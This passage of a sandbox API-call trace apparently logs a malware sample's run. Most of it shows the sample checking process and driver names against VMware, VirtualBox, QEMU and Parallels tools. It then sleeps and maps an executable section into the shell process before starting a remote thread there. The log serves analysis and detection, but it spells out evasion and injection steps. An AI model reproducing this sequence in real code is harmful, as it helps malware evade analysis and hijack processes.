_SubStr="qemu-ga.exe") returned 0x0 [0084.838] wcsstr (_Str="rule_night.exe", _SubStr="qga.exe") returned 0x0 [0084.838] wcsstr (_Str="rule_night.exe", _SubStr="windanr.exe") returned 0x0 [0084.838] wcsstr (_Str="rule_night.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.838] wcsstr (_Str="rule_night.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.838] wcsstr (_Str="rule_night.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.838] wcsstr (_Str="rule_night.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.838] wcsstr (_Str="lawyercheckpractice.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.838] wcsstr (_Str="lawyercheckpractice.exe", _SubStr="qga.exe") returned 0x0 [0084.838] wcsstr (_Str="lawyercheckpractice.exe", _SubStr="windanr.exe") returned 0x0 [0084.838] wcsstr (_Str="lawyercheckpractice.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.838] wcsstr (_Str="lawyercheckpractice.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.838] wcsstr (_Str="lawyercheckpractice.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.838] wcsstr (_Str="lawyercheckpractice.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.838] wcsstr (_Str="move.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.838] wcsstr (_Str="move.exe", _SubStr="qga.exe") returned 0x0 [0084.839] wcsstr (_Str="move.exe", _SubStr="windanr.exe") returned 0x0 [0084.839] wcsstr (_Str="move.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.839] wcsstr (_Str="move.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.839] wcsstr (_Str="move.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.839] wcsstr (_Str="move.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.839] wcsstr (_Str="propertystep.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.839] wcsstr (_Str="propertystep.exe", _SubStr="qga.exe") returned 0x0 [0084.839] wcsstr (_Str="propertystep.exe", _SubStr="windanr.exe") returned 0x0 [0084.839] wcsstr (_Str="propertystep.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.839] wcsstr (_Str="propertystep.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.839] wcsstr (_Str="propertystep.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.839] wcsstr (_Str="propertystep.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.839] wcsstr (_Str="condition.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.839] wcsstr (_Str="condition.exe", _SubStr="qga.exe") returned 0x0 [0084.839] wcsstr (_Str="condition.exe", _SubStr="windanr.exe") returned 0x0 [0084.839] wcsstr (_Str="condition.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.839] wcsstr (_Str="condition.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.839] wcsstr (_Str="condition.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.839] wcsstr (_Str="condition.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.839] wcsstr (_Str="deep.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.839] wcsstr (_Str="deep.exe", _SubStr="qga.exe") returned 0x0 [0084.839] wcsstr (_Str="deep.exe", _SubStr="windanr.exe") returned 0x0 [0084.839] wcsstr (_Str="deep.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.839] wcsstr (_Str="deep.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.839] wcsstr (_Str="deep.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.839] wcsstr (_Str="deep.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.840] wcsstr (_Str="candidate-coach.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.840] wcsstr (_Str="candidate-coach.exe", _SubStr="qga.exe") returned 0x0 [0084.840] wcsstr (_Str="candidate-coach.exe", _SubStr="windanr.exe") returned 0x0 [0084.840] wcsstr (_Str="candidate-coach.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.840] wcsstr (_Str="candidate-coach.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.840] wcsstr (_Str="candidate-coach.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.840] wcsstr (_Str="candidate-coach.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.840] wcsstr (_Str="central rule.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.840] wcsstr (_Str="central rule.exe", _SubStr="qga.exe") returned 0x0 [0084.840] wcsstr (_Str="central rule.exe", _SubStr="windanr.exe") returned 0x0 [0084.840] wcsstr (_Str="central rule.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.841] LocalFree (hMem=0x294aa8) returned 0x0 [0084.841] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0xbdb8) returned 0xc0000004 [0084.842] LocalAlloc (uFlags=0x40, uBytes=0xcdb8) returned 0x294aa8 [0084.842] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x294aa8, Length=0xcdb8, ResultLength=0x18ff5c | out: SystemInformation=0x294aa8, ResultLength=0x18ff5c*=0xbdb8) returned 0x0 [0084.843] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0084.844] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0084.845] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vmci.s") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vmusbm") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vmmous") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vm3dmp") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vmrawd") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vmmemc") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vboxgu") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vboxsf") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vboxmo") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vboxvi") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vboxdi") returned 0x0 [0084.846] strstr (_Str="kdcom.dll", _SubStr="vioser") returned 0x0 [0084.847] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0084.847] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0084.847] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0084.847] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0084.848] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0084.848] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0084.848] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0084.848] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0084.848] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0084.848] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0084.848] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0084.848] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vmci.s") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vmusbm") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vmmous") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vm3dmp") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vmrawd") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vmmemc") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vboxgu") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vboxsf") returned 0x0 [0084.848] strstr (_Str="pshed.dll", _SubStr="vboxmo") returned 0x0 [0084.849] strstr (_Str="pshed.dll", _SubStr="vboxvi") returned 0x0 [0084.849] strstr (_Str="pshed.dll", _SubStr="vboxdi") returned 0x0 [0084.849] strstr (_Str="pshed.dll", _SubStr="vioser") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vmci.s") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vmusbm") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vmmous") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vm3dmp") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vmrawd") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vmmemc") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vboxgu") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vboxsf") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vboxmo") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vboxvi") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vboxdi") returned 0x0 [0084.849] strstr (_Str="clfs.sys", _SubStr="vioser") returned 0x0 [0084.849] strstr (_Str="ci.dll", _SubStr="vmci.s") returned 0x0 [0084.849] strstr (_Str="ci.dll", _SubStr="vmusbm") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vmmous") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vm3dmp") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vmrawd") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vmmemc") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vboxgu") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vboxsf") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vboxmo") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vboxvi") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vboxdi") returned 0x0 [0084.850] strstr (_Str="ci.dll", _SubStr="vioser") returned 0x0 [0084.850] strstr (_Str="wdf01000.sys", _SubStr="vmci.s") returned 0x0 [0084.850] strstr (_Str="wdf01000.sys", _SubStr="vmusbm") returned 0x0 [0084.850] strstr (_Str="wdf01000.sys", _SubStr="vmmous") returned 0x0 [0084.850] strstr (_Str="wdf01000.sys", _SubStr="vm3dmp") returned 0x0 [0084.850] strstr (_Str="wdf01000.sys", _SubStr="vmrawd") returned 0x0 [0084.850] strstr (_Str="wdf01000.sys", _SubStr="vmmemc") returned 0x0 [0084.850] strstr (_Str="wdf01000.sys", _SubStr="vboxgu") returned 0x0 [0084.851] strstr (_Str="wdf01000.sys", _SubStr="vboxsf") returned 0x0 [0084.851] strstr (_Str="wdf01000.sys", _SubStr="vboxmo") returned 0x0 [0084.851] strstr (_Str="wdf01000.sys", _SubStr="vboxvi") returned 0x0 [0084.851] strstr (_Str="wdf01000.sys", _SubStr="vboxdi") returned 0x0 [0084.851] strstr (_Str="wdf01000.sys", _SubStr="vioser") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vmci.s") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vmusbm") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vmmous") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vm3dmp") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vmrawd") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vmmemc") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vboxgu") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vboxsf") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vboxmo") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vboxvi") returned 0x0 [0084.851] strstr (_Str="wdfldr.sys", _SubStr="vboxdi") returned 0x0 [0084.852] strstr (_Str="wdfldr.sys", _SubStr="vioser") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vmci.s") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vmusbm") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vmmous") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vm3dmp") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vmrawd") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vmmemc") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vboxgu") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vboxsf") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vboxmo") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vboxvi") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vboxdi") returned 0x0 [0084.852] strstr (_Str="acpi.sys", _SubStr="vioser") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vmci.s") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vmusbm") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vmmous") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vm3dmp") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vmrawd") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vmmemc") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vboxgu") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vboxsf") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vboxmo") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vboxvi") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vboxdi") returned 0x0 [0084.853] strstr (_Str="wmilib.sys", _SubStr="vioser") returned 0x0 [0084.853] strstr (_Str="msisadrv.sys", _SubStr="vmci.s") returned 0x0 [0084.853] strstr (_Str="msisadrv.sys", _SubStr="vmusbm") returned 0x0 [0084.853] strstr (_Str="msisadrv.sys", _SubStr="vmmous") returned 0x0 [0084.853] strstr (_Str="msisadrv.sys", _SubStr="vm3dmp") returned 0x0 [0084.854] strstr (_Str="msisadrv.sys", _SubStr="vmrawd") returned 0x0 [0084.854] strstr (_Str="msisadrv.sys", _SubStr="vmmemc") returned 0x0 [0084.854] strstr (_Str="msisadrv.sys", _SubStr="vboxgu") returned 0x0 [0084.854] strstr (_Str="msisadrv.sys", _SubStr="vboxsf") returned 0x0 [0084.854] strstr (_Str="msisadrv.sys", _SubStr="vboxmo") returned 0x0 [0084.854] strstr (_Str="msisadrv.sys", _SubStr="vboxvi") returned 0x0 [0084.854] strstr (_Str="msisadrv.sys", _SubStr="vboxdi") returned 0x0 [0084.854] strstr (_Str="msisadrv.sys", _SubStr="vioser") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vmci.s") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vmusbm") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vmmous") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vm3dmp") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vmrawd") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vmmemc") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vboxgu") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vboxsf") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vboxmo") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vboxvi") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vboxdi") returned 0x0 [0084.854] strstr (_Str="pci.sys", _SubStr="vioser") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vmci.s") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vmusbm") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vmmous") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vm3dmp") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vmrawd") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vmmemc") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vboxgu") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vboxsf") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vboxmo") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vboxvi") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vboxdi") returned 0x0 [0084.855] strstr (_Str="vdrvroot.sys", _SubStr="vioser") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vmci.s") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vmusbm") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vmmous") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vm3dmp") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vmrawd") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vmmemc") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vboxgu") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vboxsf") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vboxmo") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vboxvi") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vboxdi") returned 0x0 [0084.856] strstr (_Str="partmgr.sys", _SubStr="vioser") returned 0x0 [0084.856] strstr (_Str="volmgr.sys", _SubStr="vmci.s") returned 0x0 [0084.856] strstr (_Str="volmgr.sys", _SubStr="vmusbm") returned 0x0 [0084.856] strstr (_Str="volmgr.sys", _SubStr="vmmous") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vm3dmp") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vmrawd") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vmmemc") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vboxgu") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vboxsf") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vboxmo") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vboxvi") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vboxdi") returned 0x0 [0084.857] strstr (_Str="volmgr.sys", _SubStr="vioser") returned 0x0 [0084.857] strstr (_Str="volmgrx.sys", _SubStr="vmci.s") returned 0x0 [0084.857] strstr (_Str="volmgrx.sys", _SubStr="vmusbm") returned 0x0 [0084.857] strstr (_Str="volmgrx.sys", _SubStr="vmmous") returned 0x0 [0084.857] strstr (_Str="volmgrx.sys", _SubStr="vm3dmp") returned 0x0 [0084.857] strstr (_Str="volmgrx.sys", _SubStr="vmrawd") returned 0x0 [0084.857] strstr (_Str="volmgrx.sys", _SubStr="vmmemc") returned 0x0 [0084.857] strstr (_Str="volmgrx.sys", _SubStr="vboxgu") returned 0x0 [0084.858] strstr (_Str="volmgrx.sys", _SubStr="vboxsf") returned 0x0 [0084.858] strstr (_Str="volmgrx.sys", _SubStr="vboxmo") returned 0x0 [0084.858] strstr (_Str="volmgrx.sys", _SubStr="vboxvi") returned 0x0 [0084.858] strstr (_Str="volmgrx.sys", _SubStr="vboxdi") returned 0x0 [0084.858] strstr (_Str="volmgrx.sys", _SubStr="vioser") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vmci.s") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vmusbm") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vmmous") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vm3dmp") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vmrawd") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vmmemc") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vboxgu") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vboxsf") returned 0x0 [0084.858] strstr (_Str="mountmgr.sys", _SubStr="vboxmo") returned 0x0 [0084.859] strstr (_Str="mountmgr.sys", _SubStr="vboxvi") returned 0x0 [0084.859] strstr (_Str="mountmgr.sys", _SubStr="vboxdi") returned 0x0 [0084.859] strstr (_Str="mountmgr.sys", _SubStr="vioser") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vmci.s") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vmusbm") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vmmous") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vm3dmp") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vmrawd") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vmmemc") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vboxgu") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vboxsf") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vboxmo") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vboxvi") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vboxdi") returned 0x0 [0084.859] strstr (_Str="atapi.sys", _SubStr="vioser") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vmci.s") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vmusbm") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vmmous") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vm3dmp") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vmrawd") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vmmemc") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vboxgu") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vboxsf") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vboxmo") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vboxvi") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vboxdi") returned 0x0 [0084.861] strstr (_Str="ataport.sys", _SubStr="vioser") returned 0x0 [0084.861] strstr (_Str="msahci.sys", _SubStr="vmci.s") returned 0x0 [0084.861] strstr (_Str="msahci.sys", _SubStr="vmusbm") returned 0x0 [0084.861] strstr (_Str="msahci.sys", _SubStr="vmmous") returned 0x0 [0084.861] strstr (_Str="msahci.sys", _SubStr="vm3dmp") returned 0x0 [0084.861] strstr (_Str="msahci.sys", _SubStr="vmrawd") returned 0x0 [0084.862] strstr (_Str="msahci.sys", _SubStr="vmmemc") returned 0x0 [0084.862] strstr (_Str="msahci.sys", _SubStr="vboxgu") returned 0x0 [0084.862] strstr (_Str="msahci.sys", _SubStr="vboxsf") returned 0x0 [0084.862] strstr (_Str="msahci.sys", _SubStr="vboxmo") returned 0x0 [0084.863] LocalFree (hMem=0x294aa8) returned 0x0 [0084.863] Sleep (dwMilliseconds=0x1388) [0090.507] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x18ff24*=0x0, ZeroBits=0x0, RegionSize=0x18ff2c*=0x5200, AllocationType=0x3000, Protect=0x4 | out: BaseAddress=0x18ff24*=0x3a0000, RegionSize=0x18ff2c*=0x6000) returned 0x0 [0090.509] GetShellWindow () returned 0x100e6 [0090.509] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x18fed0 | out: lpdwProcessId=0x18fed0) returned 0x13c [0090.509] NtOpenProcess (in: ProcessHandle=0x18ff20, DesiredAccess=0x40, ObjectAttributes=0x18ff08*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x18ff00*(UniqueProcess=0x390, UniqueThread=0x0) | out: ProcessHandle=0x18ff20*=0x80) returned 0x0 [0090.509] NtDuplicateObject (in: SourceProcessHandle=0x80, SourceHandle=0xffffffff, TargetProcessHandle=0xffffffff, TargetHandle=0x18ff24, DesiredAccess=0x0, HandleAttributes=0x0, Options=0x2 | out: TargetHandle=0x18ff24*=0x84) returned 0x0 [0090.509] NtCreateSection (in: SectionHandle=0x18fedc, DesiredAccess=0x6, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x4, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fedc*=0x88) returned 0x0 [0090.509] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0xffffffff, BaseAddress=0x18feec*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18feec*=0x3b0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0090.510] NtMapViewOfSection (in: SectionHandle=0x88, ProcessHandle=0x84, BaseAddress=0x18fef4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fef4*=0x27a0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x5000) returned 0x0 [0095.517] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b0000, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\d609a21245d77dccd6d4a659cbd9466a.virus.exe")) returned 0x45 [0095.518] NtCreateSection (in: SectionHandle=0x18fed8, DesiredAccess=0xe, ObjectAttributes=0x0, MaximumSize=0x18fee0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fed8*=0x8c) returned 0x0 [0095.518] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0xffffffff, BaseAddress=0x18fee8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x15200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x18fee8*=0x3c0000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0095.519] NtMapViewOfSection (in: SectionHandle=0x8c, ProcessHandle=0x84, BaseAddress=0x18fef0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x20 | out: BaseAddress=0x18fef0*=0x3a10000, SectionOffset=0x0, ViewSize=0x18fef8*=0x16000) returned 0x0 [0095.522] RtlCreateUserThread (in: ProcessHandle=0x84, SecurityDescriptor=0x0, CreateSuspended=0, StackZeroBits=0x0, StackReserve=0x0, StackCommit=0x0, StartAddress=0x3a11930, Parameter=0x27a0000, ThreadHandle=0x18fe30*=0x77a16c9a77a16c93, ClientId=0x0 | out: 